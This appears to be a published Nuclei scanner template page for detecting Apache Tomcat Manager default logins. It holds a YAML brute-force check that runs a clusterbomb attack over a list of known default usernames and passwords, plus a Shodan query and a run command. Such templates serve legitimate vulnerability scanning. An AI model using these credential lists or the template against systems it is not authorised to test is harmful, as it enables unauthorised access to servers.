Apache Tomcat Manager Default Login

ID: tomcat-default-login

Severity: high

Author: pdteam,sinKettu,nybble04

Tags: tomcat,apache,default-login

Description

Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.

YAML Source

id: tomcat-default-login

info:
  name: Apache Tomcat Manager Default Login
  author: pdteam,sinKettu,nybble04
  severity: high
  description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
  reference:
    - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
    - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
  classification:
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    max-request: 405
    vendor: apache
    product: tomcat
    shodan-query: title:"Apache Tomcat"
  tags: tomcat,apache,default-login

http:
  - raw:
      - |
        GET /manager/html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - ADMIN
        - QCC
        - admin
        - both
        - cxsdk
        - demo
        - j2deployer
        - manager
        - ovwebusr
        - role
        - role1
        - root
        - server_admin
        - tomcat
        - xampp
      password:
        - ADMIN
        - OvW*busr1
        - Password1
        - QLogic66
        - admanager
        - admin
        - adrole1
        - adroot
        - ads3cret
        - adtomcat
        - advagrant
        - changethis
        - demo
        - j2deployer
        - kdsxc
        - manager
        - owaspbwa
        - password
        - password1
        - r00t
        - role1
        - root
        - s3cret
        - tomcat
        - toor
        - vagrant
        - xampp
    attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
    threads: 30

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Apache Tomcat"
          - "Server Information"
        condition: and

      - type: word
        part: body
        words:
          - "Tomcat Version"
          - "JVM Version"
          - "JVM Vendor"
          - "OS Name"
          - "OS Version"
          - "OS Architecture"
          - "Hostname"
          - "IP Address"
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100def1dc6950f9893115c625eaf21336fdc8a9d7a9e7bd5f4f696428267541a9ab022100eaae69e3c327f20780e5a9904382be955af8bbba65d9ee694ba1b55147a657ae:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/apache/tomcat-default-login.yaml"

View on Github